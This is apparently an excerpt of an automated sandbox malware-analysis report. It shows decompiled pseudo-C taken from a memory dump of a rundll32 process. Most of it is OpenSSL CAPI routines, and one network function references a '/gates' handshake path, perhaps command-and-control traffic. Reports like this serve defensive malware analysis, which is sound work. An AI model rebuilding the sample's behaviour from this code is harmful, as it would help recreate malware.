                                        0x21ef302e614
                                        0x21ef302e622
                                        0x21ef302e62b
                                        0x21ef302e63b
                                        0x21ef302e654

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptHash$CreateDestroyParamSign
                                        • String ID: ($..\..\openssl-1.1.0f\engines\e_capi.c$Called CAPI_dsa_do_sign()
                                        • API String ID: 471198081-186588307
                                        • Opcode ID: 3b5b73225221eb9b2d2b786f7a0e173a429617eed4c9d19b9ee9ad9dba4f9985
                                        • Instruction ID: da3118f10d4c351e1c8bf103823e099ade8ff4546ef370de7a59a76231e27ab6
                                        • Opcode Fuzzy Hash: 3b5b73225221eb9b2d2b786f7a0e173a429617eed4c9d19b9ee9ad9dba4f9985
                                        • Instruction Fuzzy Hash: 87A1A33671529089FF21DBB19C187EF3BB06769788F05405AEE8957F96DA2CC606CB20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302F6B0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 121encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 36%
                                        			E0000021E21EF302F6B0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long __rbp, intOrPtr* __r8, void* __r9, long long _a8, long long _a16, long long _a24, long long _a32, char _a40, void* _a72, void* _a80, void* _a88, void* _a96) {
				void* _t21;
				long _t33;
				long long _t70;
				long long _t71;
				long long _t73;
				intOrPtr* _t87;
				intOrPtr* _t90;

				_t92 = __rbp;
				_t75 = __rcx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_a32 = __rdi;
				E0000021E21EF310C220();
				_t87 = __r8;
				_t90 = __rdx;
				r8d = r9d;
				_t21 = E0000021E21EF302D790(__rax, "capi_get_provname, index=%d\n", __r8, __r9);
				_t70 =  &_a40;
				_a32 = _t70;
				r8d = 0;
				_a24 = 0;
				__imp__CryptEnumProvidersW();
				if (_t21 != 0) goto 0xf302f76f;
				if (GetLastError() != 0x103) goto 0xf302f72e;
				goto 0xf302f895;
				if ( *0xf3209020 != 0) goto 0xf302f743;
				 *0xf3209020 = E0000021E21EF3021CE0(_t70);
				_a24 = 0x468;
				r8d = 0x68;
				E0000021E21EF30222D0(_t25, 0x68,  *0xf3209020, _t70, __rbx, _t75, "capi_get_provname, index=%d\n", _t90, __rbp, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF302D9B0(_t22,  *0xf3209020, _t70, "capi_get_provname, index=%d\n");
				goto 0xf302f895;
				_t82 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				r8d = 0x46c;
				E0000021E21EF3025700();
				_t73 = _t70;
				if (_t70 != 0) goto 0xf302f7c8;
				if ( *0xf3209020 != 0) goto 0xf302f7a2;
				 *0xf3209020 = E0000021E21EF3021CE0(_t70);
				_a24 = 0x46e;
				_t11 = _t82 - 0x27; // 0x41
				r8d = _t11;
				E0000021E21EF30222D0(_t30, 0x68,  *0xf3209020, _t70, _t73, _t75, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t90, _t92, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf302f895;
				_t71 =  &_a40;
				_a32 = _t71;
				r8d = 0;
				_a24 = _t73;
				__imp__CryptEnumProvidersW();
				if (0 != 0) goto 0xf302f852;
				_t33 = GetLastError();
				r8d = 0x473;
				E0000021E21EF3025750();
				if (_t33 == 0x103) goto 0xf302f724;
				if ( *0xf3209020 != 0) goto 0xf302f829;
				 *0xf3209020 = E0000021E21EF3021CE0(_t71);
				_a24 = 0x476;
				r8d = 0x68;
				E0000021E21EF30222D0(_t35, 0x68,  *0xf3209020, _t71, _t73, _t73, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t90, _t92, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF302D9B0(_t33,  *0xf3209020, _t71, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf302f895;
				E0000021E21EF3030FB0(_t71, _t73);
				r8d = 0x47c;
				 *_t90 = _t71;
				E0000021E21EF3025750();
				if ( *_t90 == 0) goto 0xf302f768;
				r9d =  *_t87;
				E0000021E21EF302D790(_t71, "capi_get_provname, returned name=%s, type=%d\n",  *_t90, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				return 1;
			}










                                        0x21ef302f6b0
                                        0x21ef302f6b0
                                        0x21ef302f6b0
                                        0x21ef302f6b5
                                        0x21ef302f6ba
                                        0x21ef302f6bf
                                        0x21ef302f6cb
                                        0x21ef302f6d3
                                        0x21ef302f6d6
                                        0x21ef302f6d9
                                        0x21ef302f6e9
                                        0x21ef302f6ee
                                        0x21ef302f6f6
                                        0x21ef302f6fb
                                        0x21ef302f700
                                        0x21ef302f70b
                                        0x21ef302f713
                                        0x21ef302f722
                                        0x21ef302f729
                                        0x21ef302f736
                                        0x21ef302f73d
                                        0x21ef302f748
                                        0x21ef302f750
                                        0x21ef302f75c
                                        0x21ef302f763
                                        0x21ef302f76a
                                        0x21ef302f773
                                        0x21ef302f77a
                                        0x21ef302f780
                                        0x21ef302f785
                                        0x21ef302f78b
                                        0x21ef302f795
                                        0x21ef302f79c
                                        0x21ef302f7a7
                                        0x21ef302f7b8
                                        0x21ef302f7b8
                                        0x21ef302f7bc
                                        0x21ef302f7c3
                                        0x21ef302f7c8
                                        0x21ef302f7d0
                                        0x21ef302f7d5
                                        0x21ef302f7da
                                        0x21ef302f7e1
                                        0x21ef302f7e9
                                        0x21ef302f7eb
                                        0x21ef302f7f1
                                        0x21ef302f803
                                        0x21ef302f80e
                                        0x21ef302f81c
                                        0x21ef302f823
                                        0x21ef302f82e
                                        0x21ef302f836
                                        0x21ef302f842
                                        0x21ef302f849
                                        0x21ef302f850
                                        0x21ef302f855
                                        0x21ef302f85a
                                        0x21ef302f860
                                        0x21ef302f86d
                                        0x21ef302f878
                                        0x21ef302f87e
                                        0x21ef302f88b
                                        0x21ef302f8af

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptEnumErrorLastProviders
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_get_provname, index=%d$capi_get_provname, returned name=%s, type=%d
                                        • API String ID: 747760079-1110243197
                                        • Opcode ID: d3c62bd487ecf3cefe709f60fa78e9c46ad0a716d246561f0684fb0ff28a9cde
                                        • Instruction ID: e612f314c78bb0472b3752c30760597e3332633ab22e7159d7d0c784ffcca3c2
                                        • Opcode Fuzzy Hash: d3c62bd487ecf3cefe709f60fa78e9c46ad0a716d246561f0684fb0ff28a9cde
                                        • Instruction Fuzzy Hash: 78515B76300B4086FF609B61EC087DB63E5B7A9B84F42402AAE4987F95EF3DC51AC744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302E0B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 114encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 17%
                                        			E0000021E21EF302E0B0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, long long __r14) {
				void* __rbp;
				int _t30;
				int _t31;
				signed long long _t68;
				signed long long _t69;
				long long _t74;
				char* _t87;
				void* _t90;
				signed long long _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				E0000021E21EF310C220();
				_t97 = _t96 - __rax;
				_t95 = _t97 + 0x30;
				 *((long long*)(_t95 + 0x20)) = __rbx;
				 *((long long*)(_t95 + 0x28)) = __rsi;
				 *((long long*)(_t95 + 0x30)) = __rdi;
				 *((long long*)(_t95 + 0x38)) = __r14;
				_t68 =  *0xf3203000; // 0x1fc8e4a4378e
				_t69 = _t68 ^ _t95;
				 *(_t95 + 8) = _t69;
				r14d = r8d;
				r9d = r8d;
				_t93 = __rdx;
				_t90 = __rcx;
				E0000021E21EF302D790(_t69, "capi_ctx_set_provname, name=%s, type=%d\n", __rdx, __r9);
				if (r9d == 0) goto 0xf302e1a0;
				r9d = r9d | 0xffffffff;
				 *((intOrPtr*)(_t97 + 0x28)) = 0;
				 *(_t97 + 0x20) = _t69;
				_t30 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t30 == 0) goto 0xf302e1f5;
				_t9 = __rcx + __rcx + 0xf; // 0xf
				if (_t9 - __rcx + __rcx > 0) goto 0xf302e146;
				E0000021E21EF310C220();
				_t98 = _t97 - 0xfffffff0;
				r9d = r9d | 0xffffffff;
				 *(_t98 + 0x28) = _t30;
				_t74 = _t98 + 0x30;
				 *((long long*)(_t98 + 0x20)) = _t74;
				_t31 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t74 == 0) goto 0xf302e1f5;
				r9d = r14d;
				 *((intOrPtr*)(_t98 + 0x20)) = 0xf0000000;
				__imp__CryptAcquireContextW();
				if (_t31 == 0) goto 0xf302e1f5;
				__imp__CryptReleaseContext();
				r8d = 0x665;
				_t87 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				_t81 = __rdx;
				E0000021E21EF3025150(0xffffffffffffff0, __rdx);
				if (0xfffffff0 != 0) goto 0xf302e232;
				if ( *0xf3209020 != 0) goto 0xf302e1d2;
				 *0xf3209020 = E0000021E21EF3021CE0(0xffffffffffffff0);
				 *((intOrPtr*)(_t98 + 0x20)) = 0x667;
				_t15 = _t87 - 0x25; // 0x41
				r8d = _t15;
				E0000021E21EF30222D0(_t34, 0x66,  *0xf3209020, 0xffffffffffffff0, 0xfffffff0, _t81, _t87, _t93, _t95, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf302e255;
				if ( *0xf3209020 != 0) goto 0xf302e20a;
				 *0xf3209020 = E0000021E21EF3021CE0(0xffffffffffffff0);
				 *((intOrPtr*)(_t98 + 0x20)) = 0x65f;
				_t17 = _t87 + 1; // 0x67
				r8d = _t17;
				E0000021E21EF30222D0(_t38, 0x66,  *0xf3209020, 0xffffffffffffff0, 0xfffffff0, _t81, _t87, _t93, _t95, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF302DA10( *0xf3209020, 0xffffffffffffff0, _t87);
				goto 0xf302e255;
				r8d = 0x66a;
				E0000021E21EF3025750();
				 *((long long*)(_t90 + 0x18)) = 0xfffffff0;
				 *(_t90 + 0x20) = r14d;
				E0000021E21EF310C290();
				return 1;
			}















                                        0x21ef302e0b7
                                        0x21ef302e0bc
                                        0x21ef302e0bf
                                        0x21ef302e0c4
                                        0x21ef302e0c8
                                        0x21ef302e0cc
                                        0x21ef302e0d0
                                        0x21ef302e0d4
                                        0x21ef302e0db
                                        0x21ef302e0de
                                        0x21ef302e0e5
                                        0x21ef302e0e8
                                        0x21ef302e0eb
                                        0x21ef302e0f1
                                        0x21ef302e0fb
                                        0x21ef302e102
                                        0x21ef302e10a
                                        0x21ef302e10e
                                        0x21ef302e117
                                        0x21ef302e11e
                                        0x21ef302e128
                                        0x21ef302e133
                                        0x21ef302e13a
                                        0x21ef302e14a
                                        0x21ef302e14f
                                        0x21ef302e152
                                        0x21ef302e15b
                                        0x21ef302e15f
                                        0x21ef302e166
                                        0x21ef302e16b
                                        0x21ef302e174
                                        0x21ef302e176
                                        0x21ef302e179
                                        0x21ef302e18a
                                        0x21ef302e192
                                        0x21ef302e19a
                                        0x21ef302e1a0
                                        0x21ef302e1a6
                                        0x21ef302e1ad
                                        0x21ef302e1b0
                                        0x21ef302e1bb
                                        0x21ef302e1c5
                                        0x21ef302e1cc
                                        0x21ef302e1d7
                                        0x21ef302e1e8
                                        0x21ef302e1e8
                                        0x21ef302e1ec
                                        0x21ef302e1f3
                                        0x21ef302e1fd
                                        0x21ef302e204
                                        0x21ef302e20f
                                        0x21ef302e220
                                        0x21ef302e220
                                        0x21ef302e224
                                        0x21ef302e229
                                        0x21ef302e230
                                        0x21ef302e23d
                                        0x21ef302e243
                                        0x21ef302e24d
                                        0x21ef302e251
                                        0x21ef302e25c
                                        0x21ef302e276

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharContextCryptMultiWide$AcquireRelease
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_ctx_set_provname, name=%s, type=%d
                                        • API String ID: 1602880654-1008237481
                                        • Opcode ID: 489dec11606b053378e929e3cfb55b2170a78e91299c8e507d15e3af6d8c4ddb
                                        • Instruction ID: 62154f76160074fef7d04dbc68f133fa5b707cf1699bf09e9a971bc4e3722d7a
                                        • Opcode Fuzzy Hash: 489dec11606b053378e929e3cfb55b2170a78e91299c8e507d15e3af6d8c4ddb
                                        • Instruction Fuzzy Hash: B2516E71300A8086EF609F65DC487DB27A1F7A8B98F46422AAE1987FD9DF3DC516C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF5CD0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 387networkCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 32%
                                        			E0000021E21EF2FF5CD0(void* __ebx, signed char __ecx, void* __edx, void* __edi, void* __eflags, long long __rbx, long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r8, void* __r9, signed char _a8, intOrPtr* _a40) {
				void* _v24;
				char _v312;
				char _v584;
				char _v592;
				char _v736;
				char _v1008;
				char _v1016;
				char _v1160;
				char _v1232;
				char _v1304;
				char _v1544;
				char _v1648;
				char _v1656;
				char _v1688;
				char _v1736;
				char _v1832;
				char _v1856;
				char _v1880;
				char _v1904;
				char _v1936;
				long long _v1944;
				long long _v1952;
				char _v1976;
				long long _v1984;
				long long _v1992;
				char _v2008;
				void* _v2024;
				char _v2040;
				long long _v2056;
				long long _v2064;
				long long _v2072;
				long long _v2080;
				long long _v2088;
				long long _v2096;
				long long _v2104;
				long long _v2112;
				long long _v2120;
				signed long long _v2128;
				long long _v2136;
				void* _v2168;
				long long _v2176;
				long long _v2184;
				char _v2200;
				char _v2224;
				long long _v2232;
				char _v2240;
				long long _v2248;
				long long _v2256;
				long long _v2264;
				long long _v2272;
				long long _v2280;
				long long _v2296;
				long long _v2304;
				long long _v2312;
				char _v2328;
				intOrPtr _v2332;
				intOrPtr _v2336;
				long long _v2344;
				long long _v2352;
				long long _v2360;
				long long _v2368;
				long long _v2376;
				char _v2384;
				long long _v2392;
				long long _v2400;
				long long _v2408;
				char _v2416;
				char _v2424;
				long long _v2440;
				char _v2448;
				void* _v2456;
				long long _v2464;
				char _v2472;
				char _v2484;
				intOrPtr _v2488;
				void* __rdi;
				void* __r14;
				void* _t178;
				void* _t182;
				long long _t183;
				void* _t198;
				signed int _t199;
				signed int _t200;
				char _t212;
				void* _t214;
				void* _t216;
				void* _t227;
				void* _t228;
				signed char _t230;
				void* _t239;
				void* _t240;
				long long _t265;
				long long _t267;
				long long _t277;
				long long _t280;
				long long _t282;
				long long _t286;
				long long _t289;
				intOrPtr* _t290;
				void* _t297;
				long long _t340;
				void* _t341;
				long long _t349;
				intOrPtr* _t367;
				long long _t378;
				void* _t379;
				signed long long _t380;
				signed long long _t381;
				long long _t384;
				void* _t387;
				long long _t388;
				char* _t393;
				void* _t411;
				void* _t413;
				void* _t414;
				long long _t416;

				_t391 = __r8;
				_t387 = __rbp;
				_t354 = __rdx;
				_t239 = __edi;
				_t230 = __ecx;
				_t228 = __ebx;
				_t265 = _t388;
				 *((long long*)(_t265 + 8)) = __rcx;
				 *((long long*)(_t265 - 0x800)) = 0xfffffffe;
				 *((long long*)(_t265 + 0x10)) = __rbx;
				 *((long long*)(_t265 + 0x18)) = __rsi;
				_t414 = __r9;
				_t297 = __r8;
				_t380 = __rdx;
				_t384 = __rcx;
				r15d = 0;
				_v2488 = r15d;
				 *((long long*)(__rcx + 0x18)) = 0xf;
				 *((long long*)(__rcx + 0x10)) = _t416;
				 *((intOrPtr*)(__rcx)) = r15b;
				_v2488 = 1;
				E0000021E21EF2FEFE70(__edx, _t265, __r8, _t265 - 0x8b0, __r8, _t416, _t413);
				_t178 = E0000021E21EF2FF50D0(__edx, _t297,  &_v1936);
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x140], xmm0");
				E0000021E21EF3001C60(_t178,  &_v2200, _t354, _t391, __r9);
				E0000021E21EF2FEE9E0(_t297, _v2224,  &_v2200, E0000021E21EF3001C90,  &_v2224);
				_v2248 = _t265;
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x118], xmm0");
				r8d = _a8 & 0x000000ff;
				E0000021E21EF2FF9B20(__edi, _t297,  &_v2240);
				_t393 =  &_v1936;
				_t182 = E0000021E21EF2FF9C30(_t228, _t265,  &_v1656,  &_v2224, _t387, _t393);
				if ( *((long long*)(_t380 + 0x18)) - 0x10 < 0) goto 0xf2ff5dd0;
				goto 0xf2ff5dd3;
				r8d = 0;
				_t22 = _t393 + 0x37; // 0x37
				E0000021E21EF30DD4D0();
				if (_t182 != 0) goto 0xf2ff5e40;
				_t183 = E0000021E21EF3021AE0(_t265);
				E0000021E21EF2FF4EB0(_v1544,  &_v2224);
				_v2280 = _t183;
				_v2272 = _t265;
				asm("movaps xmm0, [esp+0xf0]");
				asm("movdqa [esp+0x1e0], xmm0");
				E0000021E21EF2FEE330(_t297,  &_v1304,  &_v2040, _t379);
				E0000021E21EF31103EC(_t297,  &_v1304, 0xf31e4670, _t384);
				E0000021E21EF2FF69D0( &_v1976);
				_v1992 =  &_v1856;
				_t267 =  &_v1904;
				_v1984 = _t267;
				E0000021E21EF2FF66C0(_t267,  &_v1856);
				_t298 = _t267;
				E0000021E21EF2FF6700(_t267,  &_v1976,  &_v1904, _t384);
				E0000021E21EF2FF9CF0(__edi, _t267,  &_v1880,  &_v1648, _t267, _t267);
				0xf2ff2b00();
				_v2448 = r15d;
				E0000021E21EF310D880( &_v1880,  &_v1648);
				_v2440 = _t267;
				_v2484 = r15d;
				E0000021E21EF2FFA5F0(_t22, __edi, _t240, _t267, _t267,  &_v1648,  &_v1544, _t380, _t384,  &_v2484,  &_v2448);
				if (_v2448 == 0) goto 0xf2ff5f0d;
				0xf2fee680();
				_v2184 = "/gates";
				_v2176 = 6;
				asm("movaps xmm0, [esp+0x150]");
				asm("movdqa [esp+0x1f0], xmm0");
				r9d = 0xb;
				E0000021E21EF2FF9FB0(_t298,  &_v1832, "handshake", _t384);
				E0000021E21EF2FFA080("/gates",  &_v1160, _t380);
				E0000021E21EF2FF94F0();
				_v1952 =  &_v1016;
				if (_v1016 == 0) goto 0xf2ff5fc1;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008))))();
				_v1016 = 0;
				E0000021E21EF30161F0(_t183, _t240, _t298,  &_v1688, _t380,  &_v1160,  &_v2448, _t411);
				E0000021E21EF2FFA080( *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008)),  &_v736,  *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008)));
				E0000021E21EF2FF94F0();
				_v1944 =  &_v592;
				if (_v592 == 0) goto 0xf2ff6040;
				_t198 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v584 + 4)) +  &_v584))))();
				_v592 = 0;
				_t199 = E0000021E21EF2FE6100(_t198, _t230,  &_v1688);
				_t367 = _a40;
				_t277 =  *((intOrPtr*)(_t367 + 0x10));
				if (_t277 == 0) goto 0xf2ff60ba;
				_v2120 = _t277;
				if ( *((long long*)(_t367 + 0x18)) - 0x10 < 0) goto 0xf2ff6070;
				r8d = _t199;
				_t200 = E0000021E21EF2FE1080( &_v312,  *_t367);
				_v2112 =  *((intOrPtr*)(_t414 + 0x10));
				if ( *((long long*)(_t414 + 0x18)) - 0x10 < 0) goto 0xf2ff6099;
				goto 0xf2ff609c;
				r8d = _t200;
				E0000021E21EF2FE1290(E0000021E21EF2FE1400( *((long long*)(_t414 + 0x18)) - 0x10,  &_v312, _t414),  &_v312);
				_t381 = _t380 | 0xffffffff;
				if ( &_v1736 == _t414) goto 0xf2ff60e1;
				r8d = 0;
				E0000021E21EF2FE6530(_t298,  &_v1736, _t414, _t381, _t384,  &_v736, _t381);
				E0000021E21EF2FF9E70( &_v1832);
				E0000021E21EF2FFA0E0(_t298,  &_v1656,  &_v1832, _t381, _t384);
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x160], xmm0");
				asm("xorps xmm1, xmm1");
				asm("movdqu [esp+0x170], xmm1");
				_v2136 = _t416;
				_v2128 = _t381;
				_t280 =  &_v2424;
				_v2104 = _t280;
				_v2416 = _t280;
				_v2408 = _t280;
				_v2400 = _t280;
				_v2392 = _t280;
				_v2416 = _t416;
				_v2408 =  &_v2416;
				_t282 =  &_v2416;
				_v2400 = _t282;
				_v2392 = r15d;
				_v2424 = _t416;
				_v2384 = _t282;
				_v2376 = _t282;
				_v2384 =  &_v2384;
				_v2376 =  &_v2384;
				_v2368 = _t416;
				_v2360 = _t416;
				_v2352 = _t416;
				_v2344 = _t416;
				_v2336 = 0xb;
				_v2332 = 0xc8;
				_v2096 =  &_v2328;
				_v2312 = _t416;
				_v2304 = _t416;
				_v2304 = 0xf;
				_v2312 = _t416;
				_v2328 = 0;
				E0000021E21EF2FFA220(_t298,  &_v1656,  &_v2168, _t381, _t384,  &_v2424, _t414);
				_t286 =  &_v2328;
				if (_t384 == _t286) goto 0xf2ff6258;
				r8d = 0;
				E0000021E21EF2FE6530(_t298, _t384,  &_v2328, _t381, _t384,  &_v2424, _t381);
				_v2472 = r15d;
				E0000021E21EF310D880(_t384,  &_v2328);
				_v2464 = _t286;
				E0000021E21EF2FFA380(0, _t239, _t240, _t384 - _t286, _t286, _t298,  &_v1648,  &_v1544, _t381, _t384,  &_v2424,  &_v2472);
				0xf2fee810();
				_v2088 = _t286;
				_v2264 = 2;
				_v2256 = _t286;
				asm("movaps xmm0, [esp+0x100]");
				asm("movdqa [esp+0x330], xmm0");
				_t212 = _v2472;
				if (_v2464 != _t286) goto 0xf2ff62c2;
				if (_t212 == 2) goto 0xf2ff62fe;
				if (_t212 == 0) goto 0xf2ff62fe;
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x200], xmm0");
				E0000021E21EF2FEE330(_t298,  &_v1232,  &_v2008);
				_t214 = E0000021E21EF31103EC(_t298,  &_v1232, 0xf31e4670, _t384);
				_v2080 =  &_v2328;
				E0000021E21EF2FE6100(_t214, _t230,  &_v2328);
				_t216 = E0000021E21EF2FF9470(_t298,  &_v2424);
				_t340 = _v2168;
				if (_t340 == 0) goto 0xf2ff63ac;
				_t289 = _v2136 - _t340;
				_v2072 = _t289;
				_v2296 = _t340;
				if (_t289 - 0x1000 < 0) goto 0xf2ff63a6;
				if ((_t230 & 0x0000001f) == 0) goto 0xf2ff6361;
				0xf3111be8();
				_t290 = _t340 - 8;
				_v2064 = _t290;
				_t378 =  *_t290;
				_v2056 = _t378;
				if (_t378 - _t340 < 0) goto 0xf2ff6382;
				0xf3111be8();
				_t341 = _t340 - _t378;
				if (_t341 - 8 >= 0) goto 0xf2ff6390;
				0xf3111be8();
				if (_t341 - 0x27 <= 0) goto 0xf2ff639b;
				0xf3111be8();
				_v2296 = _t378;
				0xf310ba8c();
				_v2264 =  &_v1736;
				E0000021E21EF2FE6100(_t216, _t230,  &_v1736);
				E0000021E21EF2FF9470(_t298,  &_v1832);
				E0000021E21EF2FF5BD0(_t239, _t298,  &_v1976);
				E0000021E21EF2FF5710(_t341 - 0x27, _t298,  &_v1544, _t384,  &_v2472);
				_v2280 =  &_v1648;
				E0000021E21EF2FF8910(_t239, _t298,  &_v1648);
				E0000021E21EF2FF6E60(_t239, _t298,  &_v2240,  &_v2424);
				_t349 = _v2232;
				if (_t349 == 0) goto 0xf2ff6463;
				_v2456 = _t349;
				asm("lock xadd [ecx+0x8], eax");
				if (_t239 != 1) goto 0xf2ff6463;
				 *((intOrPtr*)( *_v2456))();
				asm("lock xadd [ebx+0xc], eax");
				if (_t239 != 1) goto 0xf2ff6463;
				 *((intOrPtr*)( *_v2456 + 8))();
				_t227 = E0000021E21EF2FF51A0(_t239,  *_v2456, _v2456,  &_v1936);
				asm("lock xadd [0x2151b7], edi");
				if (_t239 != 1) goto 0xf2ff6485;
				__imp__#116();
				0xf2feed90();
				return _t227;
			}























































































































                                        0x21ef2ff5cd0
                                        0x21ef2ff5cd0
                                        0x21ef2ff5cd0
                                        0x21ef2ff5cd0
                                        0x21ef2ff5cd0
                                        0x21ef2ff5cd0
                                        0x21ef2ff5cd0
                                        0x21ef2ff5cd3
                                        0x21ef2ff5ce3
                                        0x21ef2ff5cee
                                        0x21ef2ff5cf2
                                        0x21ef2ff5cf6
                                        0x21ef2ff5cf9
                                        0x21ef2ff5cfc
                                        0x21ef2ff5cff
                                        0x21ef2ff5d02
                                        0x21ef2ff5d05
                                        0x21ef2ff5d0a
                                        0x21ef2ff5d12
                                        0x21ef2ff5d16
                                        0x21ef2ff5d19
                                        0x21ef2ff5d28
                                        0x21ef2ff5d36
                                        0x21ef2ff5d3c
                                        0x21ef2ff5d3f
                                        0x21ef2ff5d52
                                        0x21ef2ff5d76
                                        0x21ef2ff5d7b
                                        0x21ef2ff5d83
                                        0x21ef2ff5d86
                                        0x21ef2ff5d8f
                                        0x21ef2ff5da0
                                        0x21ef2ff5da6
                                        0x21ef2ff5dbe
                                        0x21ef2ff5dc9
                                        0x21ef2ff5dce
                                        0x21ef2ff5dd3
                                        0x21ef2ff5dd6
                                        0x21ef2ff5de2
                                        0x21ef2ff5de9
                                        0x21ef2ff5deb
                                        0x21ef2ff5df2
                                        0x21ef2ff5df7
                                        0x21ef2ff5dfe
                                        0x21ef2ff5e06
                                        0x21ef2ff5e0e
                                        0x21ef2ff5e27
                                        0x21ef2ff5e3b
                                        0x21ef2ff5e4e
                                        0x21ef2ff5e5c
                                        0x21ef2ff5e64
                                        0x21ef2ff5e6c
                                        0x21ef2ff5e7c
                                        0x21ef2ff5e81
                                        0x21ef2ff5e94
                                        0x21ef2ff5eb0
                                        0x21ef2ff5ebd
                                        0x21ef2ff5ec2
                                        0x21ef2ff5ec7
                                        0x21ef2ff5ecc
                                        0x21ef2ff5ed1
                                        0x21ef2ff5ef0
                                        0x21ef2ff5efa
                                        0x21ef2ff5f08
                                        0x21ef2ff5f14
                                        0x21ef2ff5f1c
                                        0x21ef2ff5f28
                                        0x21ef2ff5f30
                                        0x21ef2ff5f39
                                        0x21ef2ff5f4f
                                        0x21ef2ff5f60
                                        0x21ef2ff5f7b
                                        0x21ef2ff5f89
                                        0x21ef2ff5f99
                                        0x21ef2ff5fb7
                                        0x21ef2ff5fb9
                                        0x21ef2ff5fce
                                        0x21ef2ff5fdf
                                        0x21ef2ff5ffa
                                        0x21ef2ff6008
                                        0x21ef2ff6018
                                        0x21ef2ff6036
                                        0x21ef2ff6038
                                        0x21ef2ff6048
                                        0x21ef2ff604d
                                        0x21ef2ff6055
                                        0x21ef2ff605c
                                        0x21ef2ff605e
                                        0x21ef2ff606b
                                        0x21ef2ff6070
                                        0x21ef2ff607b
                                        0x21ef2ff6085
                                        0x21ef2ff6092
                                        0x21ef2ff6097
                                        0x21ef2ff609c
                                        0x21ef2ff60b5
                                        0x21ef2ff60c2
                                        0x21ef2ff60c9
                                        0x21ef2ff60ce
                                        0x21ef2ff60dc
                                        0x21ef2ff60e9
                                        0x21ef2ff60fe
                                        0x21ef2ff6103
                                        0x21ef2ff6106
                                        0x21ef2ff610f
                                        0x21ef2ff6112
                                        0x21ef2ff611b
                                        0x21ef2ff6123
                                        0x21ef2ff612b
                                        0x21ef2ff6130
                                        0x21ef2ff613a
                                        0x21ef2ff613f
                                        0x21ef2ff6144
                                        0x21ef2ff6149
                                        0x21ef2ff6151
                                        0x21ef2ff615b
                                        0x21ef2ff6160
                                        0x21ef2ff6165
                                        0x21ef2ff616a
                                        0x21ef2ff6172
                                        0x21ef2ff6179
                                        0x21ef2ff6181
                                        0x21ef2ff6191
                                        0x21ef2ff61a1
                                        0x21ef2ff61a9
                                        0x21ef2ff61b1
                                        0x21ef2ff61b9
                                        0x21ef2ff61c1
                                        0x21ef2ff61c9
                                        0x21ef2ff61d4
                                        0x21ef2ff61e7
                                        0x21ef2ff61ef
                                        0x21ef2ff61f7
                                        0x21ef2ff61ff
                                        0x21ef2ff620b
                                        0x21ef2ff6213
                                        0x21ef2ff6230
                                        0x21ef2ff6235
                                        0x21ef2ff6240
                                        0x21ef2ff6245
                                        0x21ef2ff6253
                                        0x21ef2ff6258
                                        0x21ef2ff625d
                                        0x21ef2ff6262
                                        0x21ef2ff627c
                                        0x21ef2ff6281
                                        0x21ef2ff6286
                                        0x21ef2ff628e
                                        0x21ef2ff6299
                                        0x21ef2ff62a1
                                        0x21ef2ff62a9
                                        0x21ef2ff62b7
                                        0x21ef2ff62bb
